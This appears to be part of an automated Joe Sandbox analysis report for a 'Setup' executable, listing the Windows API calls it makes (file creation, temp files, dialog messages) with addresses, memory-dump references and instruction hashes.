                                                                                                                                                                              control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                              • String ID: HideWindow
                                                                                                                                                                              • API String ID: 1249568736-780306582
                                                                                                                                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                              APIs
                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                              APIs
                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4115351271-0
                                                                                                                                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                              APIs
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
